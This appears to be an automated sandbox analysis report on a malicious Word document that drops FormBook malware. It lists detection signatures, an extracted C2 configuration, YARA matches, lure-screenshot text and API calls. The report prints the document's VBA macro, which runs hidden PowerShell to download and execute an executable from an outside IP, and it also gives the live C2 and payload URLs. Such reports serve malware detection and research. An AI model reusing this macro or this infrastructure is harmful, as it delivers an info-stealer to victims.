Analysis Report RFL_PO 69002.doc

Overview

General Information

Sample Name:	RFL_PO 69002.doc
Analysis ID:	433026
MD5:	ee4431e2c986dcac3fc8078c674ba65e
SHA1:	64aa75122963e38f52739ba819788e4bfcfb3651
SHA256:	4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (process start blacklist hit)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Sigma detected: Execution from Suspicious Folder

Sigma detected: Microsoft Office Product Spawning Windows Shell

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected Costura Assembly Loader

Abnormal high CPU Usage

Allocates a big amount of memory (probably used for heap spraying)

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Non Interactive PowerShell

Sigma detected: Suspicious Bitsadmin Job via PowerShell

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.bucksnortneola.com/gw2/"], "decoy": ["kmampc.com", "swagsoldier.com", "achochapo.com", "nestymentemaestra.com", "rakuen-beans.info", "portaldainsolvencia.com", "nationaltodaytv.com", "monadiclab.com", "thebudgetfurnituredenver.com", "sifangzhouzi.com", "quangcaosonthach.com", "cbluebeltliveshop.com", "hyperrealmarketing.com", "dallasproducecompany.com", "zizhizhengshu.com", "becosyshe.com", "injectionhub.com", "wasteshelter.com", "gapegod.com", "danfrem.com", "emag.enterprises", "insomniaut.com", "margaretsboutiquenb.com", "bestmovies4k.com", "hsxytz.com", "veles.asia", "graphicoustic.com", "rzeroxi.com", "cristyleebennett.com", "vercoicsporno.club", "awdworldwide.com", "agrilast.com", "vineyardplaceseniorliving.com", "blancaholidaylets.com", "didixun.com", "localmiller.com", "gravityphysiotherapy.com", "couchtabledesktop.com", "cypresswoodsseniorliving.com", "mmdastro.com", "opportunitybsi.com", "deejspeaks.com", "alllivesmattertojesus.info", "clippingpathmask.com", "tuoitrechuatraisudoi.site", "mipecheritage.info", "acadeopolis.com", "52jnh.com", "thetrust.place", "highseachartersct.com", "booklarge.com", "kela-de.com", "ea-it-pantomath.com", "tricountyrr.com", "blackeye.online", "hidrovaco.com", "sleeplessreconnaissance.life", "newalbanyironworks.com", "scthxb.com", "bossssss.com", "isaostar.com", "pointredeem.com", "myfulfillmentproject.com", "toikawai.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Metadefender: Detection: 20%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: RFL_PO 69002.doc	Virustotal: Detection: 15%			Perma Link
Source: RFL_PO 69002.doc	ReversingLabs: Detection: 21%

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: RFL_PO 69002.doc

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 28.0.nothinglittle.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.nothinglittle.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: nothinglittle.exe, 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nothinglittle.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	9_2_03021500
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 4x nop then pop esi	28_2_004172E4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 4x nop then pop edi	28_2_00417D55

Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 4	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital Page1 of 1 Owords It? O
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital
Source: Screenshot number: 8	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content" Protected File From Ohiohealt
Source: Screenshot number: 8	Screenshot OCR: Enable Content" Protected File From Ohiohealth Hardin Memorial Hospital k L Owords It? O Type h

Source: RFL_PO 69002.doc	OLE, VBA macro line: rememberhead = CreateObject("wscript.s" & calllife).Run(insidewith & calllife & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) & "http://31.210.20.45/1xBet/RFL_0769002.ex" & Chr(101) & Chr(34) & " -Destination " & Chr(34) & "C:\Users\Public\Documents\nothinglittle.ex" & Chr(101) & Chr(34) & ";C:\Users\Public\Documents\nothinglittle.ex" & Chr(101))
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open, API IWshShell3.Run("powershell -w h Start-BitsTransfer -Source "http://31.210.20.45/1xBet/RFL_0769002.exe" -Destination "C:\Users\Public\Documents\nothinglittle.exe";C:\Users\Public\Documents\nothinglittle.exe")			Name: Document_Open

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419D60 NtCreateFile,	28_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E10 NtReadFile,	28_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E90 NtClose,	28_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419F40 NtAllocateVirtualMemory,	28_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419D5A NtCreateFile,	28_2_00419D5A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419E8B NtClose,	28_2_00419E8B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00419F3A NtAllocateVirtualMemory,	28_2_00419F3A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C95D0 NtClose,LdrInitializeThunk,	28_2_012C95D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9710 NtQueryInformationToken,LdrInitializeThunk,	28_2_012C9710
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9780 NtMapViewOfSection,LdrInitializeThunk,	28_2_012C9780
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	28_2_012C9660
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	28_2_012C96E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	28_2_012C9910
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C99A0 NtCreateSection,LdrInitializeThunk,	28_2_012C99A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9860 NtQuerySystemInformation,LdrInitializeThunk,	28_2_012C9860
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A00 NtProtectVirtualMemory,LdrInitializeThunk,	28_2_012C9A00
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A50 NtCreateFile,LdrInitializeThunk,	28_2_012C9A50
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CB040 NtSuspendThread,	28_2_012CB040
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA3B0 NtGetContextThread,	28_2_012CA3B0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9520 NtWaitForSingleObject,	28_2_012C9520
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9560 NtWriteFile,	28_2_012C9560
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9540 NtReadFile,	28_2_012C9540
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C95F0 NtQueryInformationFile,	28_2_012C95F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9730 NtQueryVirtualMemory,	28_2_012C9730
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA710 NtOpenProcessToken,	28_2_012CA710
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9760 NtOpenProcess,	28_2_012C9760
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9770 NtSetInformationFile,	28_2_012C9770
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CA770 NtOpenThread,	28_2_012CA770
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C97A0 NtUnmapViewOfSection,	28_2_012C97A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9610 NtEnumerateValueKey,	28_2_012C9610
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9670 NtQueryInformationProcess,	28_2_012C9670
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9650 NtQueryValueKey,	28_2_012C9650
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C96D0 NtCreateKey,	28_2_012C96D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9950 NtQueueApcThread,	28_2_012C9950
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C99D0 NtCreateProcessEx,	28_2_012C99D0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9820 NtEnumerateKey,	28_2_012C9820
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9840 NtDelayExecution,	28_2_012C9840
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C98A0 NtWriteVirtualMemory,	28_2_012C98A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C98F0 NtReadVirtualMemory,	28_2_012C98F0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9B00 NtSetValueKey,	28_2_012C9B00
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A20 NtResumeThread,	28_2_012C9A20
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A10 NtQuerySection,	28_2_012C9A10
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9A80 NtOpenDirectoryObject,	28_2_012C9A80
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012CAD30 NtSetContextThread,	28_2_012CAD30
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012C9FE0 NtCreateMutant,	28_2_012C9FE0

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_030217B0	9_2_030217B0
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021785	9_2_03021785
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021C18	9_2_03021C18
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03021C28	9_2_03021C28
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DF528	9_2_059DF528
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DA4A8	9_2_059DA4A8
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D0006	9_2_059D0006
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D0040	9_2_059D0040
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059DEEA0	9_2_059DEEA0
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_059D6B28	9_2_059D6B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00401030	28_2_00401030
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D8BA	28_2_0041D8BA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D988	28_2_0041D988
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041E2F2	28_2_0041E2F2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_004012FB	28_2_004012FB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DA9E	28_2_0041DA9E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402D88	28_2_00402D88
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402D90	28_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00409E40	28_2_00409E40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DE31	28_2_0041DE31
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00409E3B	28_2_00409E3B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041D719	28_2_0041D719
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CFA3	28_2_0041CFA3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CFA6	28_2_0041CFA6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00402FB0	28_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041DFB0	28_2_0041DFB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120	28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129C1C0	28_2_0129C1C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341002	28_2_01341002
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B701D	28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B20A0	28_2_012B20A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013520A8	28_2_013520A8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129B090	28_2_0129B090
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013460F5	28_2_013460F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA309	28_2_012AA309
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134231B	28_2_0134231B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A3360	28_2_012A3360
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126337D	28_2_0126337D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B138B	28_2_012B138B
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01263382	28_2_01263382
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013323E3	28_2_013323E3
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013403DA	28_2_013403DA
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB236	28_2_012AB236
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126225E	28_2_0126225E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013522AE	28_2_013522AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013532A9	28_2_013532A9
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134E2C5	28_2_0134E2C5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B65A0	28_2_012B65A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2581	28_2_012B2581
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129D5E0	28_2_0129D5E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013525DD	28_2_013525DD
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2430	28_2_012A2430
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0129841F	28_2_0129841F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134D466	28_2_0134D466
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AB477	28_2_012AB477
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012694B8	28_2_012694B8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01344496	28_2_01344496
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013467E2	28_2_013467E2
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134D616	28_2_0134D616
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A5600	28_2_012A5600
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289660	28_2_01289660
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B06C0	28_2_012B06C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128F900	28_2_0128F900
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A2990	28_2_012A2990
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135E824	28_2_0135E824
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830	28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800	28_2_01286800
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012888E0	28_2_012888E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013528EC	28_2_013528EC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01352B28	28_2_01352B28
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AAB40	28_2_012AAB40
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0132CB4F	28_2_0132CB4F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BEBB0	28_2_012BEBB0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AEB9A	28_2_012AEB9A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0132EB8A	28_2_0132EB8A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012D8BE8	28_2_012D8BE8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134DBD2	28_2_0134DBD2
